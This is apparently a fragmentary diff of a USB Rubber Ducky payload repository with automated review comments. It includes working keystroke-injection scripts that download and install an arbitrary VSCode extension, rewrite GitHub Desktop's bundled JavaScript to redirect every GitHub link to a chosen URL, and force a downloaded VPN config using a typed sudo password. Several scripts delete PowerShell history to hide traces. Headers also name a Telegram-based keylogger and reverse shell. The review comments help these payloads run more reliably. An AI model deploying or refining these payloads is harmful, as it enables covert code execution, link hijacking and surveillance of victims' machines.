boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN notepad.exe
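Review bot: `REM Define here your hexadecimal code` gives no format for `#HEX_CODE` (one continuous hex string, space-separated bytes, maximum length), so a user cannot fill the define correctly without reading the rest of the payload; state the expected format next to the define. The note `Running checked but not blocked by Avast antivirus` is a point-in-time test observation that will go stale silently; either drop it or add the date and Avast version it was observed with.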

View File

@ -0,0 +1,98 @@
# Install Any Arbitrary VSCode Extension
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
## First Of All!
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
So...
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
- Always check the source and source code before doing this
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
## Features
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
- Removes any previous version of the extension.
- Completely automated, requiring no manual intervention once the script is executed.
## Requirements
- **Target OS**: Windows 10/11
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
## Usage
### DuckyScript Configuration
Before running the script, make sure to configure the following two variables in the script:
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
```plaintext
DEFINE #EXTENSION_NAME example
```
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
```plaintext
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
```
### PowerShell Commands Breakdown
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
```powershell
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
```
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
```powershell
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
}
```
## Notes
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
- Make sure that PowerShell is available on the target machine.
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
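Review bot: the README calls `$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions` "the official (the default) VSCode extensions folder", but that directory holds the extensions bundled with the editor install; user-installed extensions live in `%USERPROFILE%\.vscode\extensions`, and an editor update can replace the bundled directory. Say which location is intended and why. Given the "First Of All!" warning about arbitrary extensions, the "Downloading and Extracting" section should also verify the archive before `Expand-Archive`, for example `if ((Get-FileHash $downloadPath -Algorithm SHA256).Hash -ne $expectedSha256) { Remove-Item $downloadPath; exit }`, with the expected hash kept next to `#ARCHIVE_LINK`. Typos: `Arbotrary` in the "First Of All!" paragraph should be `Arbitrary`, and `the out folder` should be `` the `out` folder ``.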

View File

@ -0,0 +1,88 @@
REM_BLOCK
##########################################################
# #
# Title : Install Any Arbitrary VSCode Extension #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10 #
# #
##########################################################
END_REM
REM Replace "example" with the name of the extension folder
DEFINE #EXTENSION_NAME example
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
if (Test-Path -Path $extensionsPath -PathType Container) {
Remove-Item -Recurse -Force -Path $extensionsPath
}
END_STRINGLN
REM May it depends by the extension...
DELAY 2000
STRINGLN_POWERSHELL
$url = "#ARCHIVE_LINK"
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
Invoke-WebRequest -Uri $url -OutFile $downloadPath
if (Test-Path -Path $downloadPath) {
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
Remove-Item -Path $downloadPath -Force
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
}
END_STRINGLN
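Review bot: the order of the two PowerShell blocks can leave the target with no extension at all. The first block runs `Remove-Item -Recurse -Force -Path $extensionsPath` unconditionally; only afterwards does the second block attempt `Invoke-WebRequest`, and if the download fails the `if (Test-Path -Path $downloadPath)` guard skips the install while the previously installed extension is already gone. Download and `Expand-Archive` first and remove the old folder afterwards (or rely on `Expand-Archive -Force` to overwrite in place), and wrap `Invoke-WebRequest` in `try`/`catch` so a failed download is reported instead of silently skipped. A smaller point: `REM May it depends by the extension...` is unclear; if it means the 2000 ms delay depends on how long the removal in the first block takes, say so.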


@ -1,12 +1,14 @@
REM ##################################################################
REM # |
REM # Title : Make Windows performant (but ugly and boring) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ##################################################################
REM_BLOCK
##################################################################
# #
# Title : Make Windows performant (but ugly and boring) #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
##################################################################
END_REM
REM Plug-And-Play <3
@ -16,7 +18,48 @@ REM - Nothing
REM Note:
REM - Payload tested on Windows 11 Eng
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 2000
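Review bot: `$_OS` is set by the inline `PASSIVE_WINDOWS_DETECT` copy but never read: after `END_EXTENSION` the payload goes straight to `GUI r` whatever was detected, so the added lines act only as a dynamic boot delay. Either guard the rest of the payload with `IF ($_OS == WINDOWS) THEN` ... `END_IF` so nothing is typed into a non-Windows host, or say in a comment that only the delay behaviour is wanted. The `REM_BLOCK EXAMPLE USAGE AFTER EXTENSION` block with `STRING HELLO WINDOWS!` is demo text from the upstream extension and can be dropped from the pasted copy.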


@ -1,12 +1,14 @@
REM ########################################################
REM # #
REM # Title : Persistent Keylogger - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Persistent Keylogger - Telegram Based #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
########################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
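Review bot: the fixed `DELAY 1000` immediately before `EXTENSION DETECT_READY` defeats what the extension is for. Its own documentation says to place it at the beginning of the payload so it serves as the dynamic boot delay; with the constant delay in front, every run pays the full second and then the CAPSLOCK probe on top. Move the extension ahead of the `DELAY 1000` or drop the delay, and if a minimum wait is still wanted after the probe, put it after `END_EXTENSION` with a comment saying why.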


@ -1,12 +1,14 @@
REM ############################################################
REM # #
REM # Title : Persistent Reverse Shell - Telegram Based #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Execution #
REM # Target : Linux #
REM # #
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Persistent Reverse Shell - Telegram Based #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
############################################################
END_REM
REM Requirements:
REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 2000
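Review bot: the trailing `CAPSLOCK` after `END_WHILE` assumes the loop exited because the host reflected the LED (one press, Caps Lock now on, one more press turns it off). If the loop instead ran out at `#ITERATION_LIMIT`, 120 presses have already been sent (an even number, net off) and the extra press leaves Caps Lock on, so the `CTRL-ALT t` shell commands that follow are typed in upper case. Guarding the final press with `IF ($_CAPSLOCK_ON == TRUE) THEN` / `CAPSLOCK` / `END_IF` handles both exits: a reflected LED is turned back off, and a host that never reflected keeps its even press count.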


@ -0,0 +1,69 @@
# Replace Links In GithubDesktop
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
## Table of Contents
- [Features](#features)
- [Prerequisites](#prerequisites)
- [Usage](#usage)
- [Credits](#credits)
## Features
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
1. Detects the installation folder of GitHub Desktop.
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
## Prerequisites
- **Windows 10/11**
- **GitHub Desktop** installed on the machine.
## Usage
1. **Modify the script**:
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
```duckyscript
DEFINE #NEW_LINK example.com
```
2. **Customization**:
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
```ducky
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
```
3. **Execution**:
- Upon execution, the script will:
- Open PowerShell.
- Detect the GitHub Desktop installation directory.
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>
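Review bot: the two fences in the Usage section are tagged differently (`duckyscript` at step 1, `ducky` at step 2); use one tag. The README should also say what form `#NEW_LINK` takes: the example `DEFINE #NEW_LINK example.com` has no scheme, and the payload substitutes the constant for the entire `https://...` URL it matches, so a reader needs to know whether to write `https://example.com` or `example.com`. Step 2 of Features mixes the explanation with an aside addressed to GitHub Desktop developers ("I would suggest to Github Desktop developers ...") that belongs in a notes paragraph, not the feature list. And the Execution step omits that the payload ends by deleting the PowerShell history file (`Remove-Item (Get-PSReadlineOption).HistorySavePath`); list it alongside the three bullets.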


@ -0,0 +1,109 @@
REM_BLOCK
#####################################################
# #
# Title : Replace Links In GithubDesktop #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
REM REQUIRED - Define here the new url that will replace the original github link
DEFINE #NEW_LINK example.com
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"
$filePath = "$latestFolderPath$renderer"
$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent
$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN
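Review bot: the replacement drops the URL scheme. `#NEW_LINK` is documented as `example.com` (`DEFINE #NEW_LINK example.com`), and both `-replace` calls match the whole `https://...github...` URL and substitute the bare constant, so `openExternal("https://github.com/...")` becomes `openExternal("example.com")`, which is not a URL. Either keep the scheme in the replacement (`'https://#NEW_LINK'`) or document that `#NEW_LINK` must include it. Two further points on the file rewrite: `Get-Content` / `Set-Content` with Windows PowerShell defaults re-encode the JavaScript bundles according to the system code page and normalise line endings, so pass `-Encoding UTF8` on both sides (and `-Raw` on read, since `renderer.js` is a few very long lines) or the app may fail to load after the edit; and because the script edits files inside the current `app-<version>` folder, the next GitHub Desktop auto-update installs a fresh folder and the change disappears, which deserves a line in the documentation. Minor: `\d` inside `[\w\d\.\/\-]` is redundant because `\w` already matches digits.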


@ -1,13 +1,14 @@
REM ########################################################
REM # |
REM # Title : Send Email Through Thunderbird |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 - Linux(debian tested) |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Send Email Through Thunderbird #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 - Linux(debian tested) #
# #
########################################################
END_REM
REM Requirements:
REM - Internet Connection


@ -1,22 +1,64 @@
REM ############################################################
REM # |
REM # Title : Send Messages In Discord Channel-Server |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10-11 |
REM # |
REM ############################################################
REM_BLOCK
############################################################
# #
# Title : Send Messages In Discord Channel-Server #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10-11 #
# #
############################################################
END_REM
REM Requirements:
REM - Internet connection
REM - Discord Installed
REM If, for example, the server is Hak5 and the channel in which you want to send the message is called usb-rubber-ducky then you should write just usb-rubber-ducky
DEFINE #CHAT_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Discord app
GUI
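Review bot: the comment above `DEFINE #CHAT_NAME example` describes a channel name (`usb-rubber-ducky`) while the constant is called `#CHAT_NAME`; naming it `#CHANNEL_NAME` would match both the comment and the Discord term. The `PASSIVE_WINDOWS_DETECT` result is also never consulted: the payload continues with `REM Open Discord app` / `GUI` regardless of `$_OS`, and since everything after that is typed text, a non-Windows host receives those keystrokes in whatever window has focus. Wrapping the remainder in `IF ($_OS == WINDOWS) THEN` ... `END_IF` costs two lines and makes the extension worth its 40.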


@ -1,13 +1,14 @@
REM ####################################
REM # |
REM # Title : Set Arbitrary VPN |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ####################################
REM_BLOCK
####################################
# #
# Title : Set Arbitrary VPN #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Linux #
# #
####################################
END_REM
REM Requirements:
REM - Permissions
@ -15,44 +16,57 @@ REM - Internet Connection
REM - 'openvpn' installed
REM REQUIRED: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
DEFINE #SUDO_PASS example
REM REQUIRED: Set your VPN file configuration replacing example.com with your own link
DEFINE VPN_FILE_LINK example.com
DEFINE #VPN_FILE_LINK example.com
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM #### PERMISSIONS SECTION ####
STRING sudo su
ENTER
STRINGLN sudo su
DELAY 1000
STRING SUDO_PASS
ENTER
STRINGLN #SUDO_PASS
DELAY 1000
REM #### VPN SECTION ####
STRING curl
STRING VPN_FILE_LINK
STRING > vpn_configuration.ovpn
ENTER
STRINGLN curl #VPN_FILE_LINK > vpn_configuration.ovpn
REM It depends by the internet connection
DELAY 2000
STRING openvpn vpn_configuration.ovpn
STRINGLN openvpn vpn_configuration.ovpn
REM It depends by the computer power
DELAY 2000
REM #### REMOVE TRACES ####
STRING rm vpn_configuration.ovpn
ENTER
DELAY 500
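Review bot: the sudo step assumes a password prompt appears. `STRINGLN sudo su` followed a second later by `STRINGLN #SUDO_PASS` types the password blind; if sudo's credential cache is still valid from an earlier command, no prompt is shown and the password is typed as a command into the root shell and written to its history. `sudo -k su` forces the prompt every time. In the VPN section, `curl #VPN_FILE_LINK > vpn_configuration.ovpn` has no `-f`, so a 404 or redirect page is saved as the config and `openvpn vpn_configuration.ovpn` then fails on garbage; `curl -fsSL` plus a check that the download succeeded before starting openvpn would make the fixed 2000 ms delays less fragile. The placeholder `example.com` also lacks a scheme and a path, unlike `https://www.example.com/connection.py` used elsewhere in this change, and `REM It depends by the internet connection` / `REM It depends by the computer power` should read "depends on".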


@ -1,12 +1,12 @@
REM_BLOCK
################################################################
# |
# Title : Set An Arbitrary And Persistent Tor Circuit |
# Author : Aleff |
# Version : 1.0 |
# Category : Execution |
# Target : Windows 10/11; Linux; |
# |
# #
# Title : Set An Arbitrary And Persistent Tor Circuit #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11; Linux; #
# #
################################################################
Requirements:


@ -1,24 +1,65 @@
REM ########################################################
REM # |
REM # Title : Set An Arbitrary DNS (IPv4 version) |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 11 |
REM # |
REM ########################################################
REM_BLOCK
########################################################
# #
# Title : Set An Arbitrary DNS (IPv4 version) #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 11 #
# #
########################################################
END_REM
REM Requirements:
REM - Nothing
REM DNS IPv4 like Cloudflare DNS 1.1.1.1
DEFINE DNS example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Settings
DELAY 1000
GUI
DELAY 1000
STRING settings
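Review bot: `DEFINE DNS example` was not migrated to the `#`-prefixed form the rest of this change adopts (`#SUDO_PASS`, `#VPN_FILE_LINK`, `#TOKEN`). That matters beyond consistency: `DEFINE` substitutes the constant name wherever the token appears in the payload, and a bare `DNS` is exactly the kind of word a payload that walks the network settings pages is likely to type again, whereas `#DNS` cannot collide with ordinary text. Rename to `#DNS` and update its uses. The placeholder `example` is also not an IPv4 address; `1.1.1.1`, already cited in the comment above it, would make the expected format obvious.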


@ -1,12 +1,14 @@
REM ###################################
REM # |
REM # Title : Set Tor Bridge |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###################################
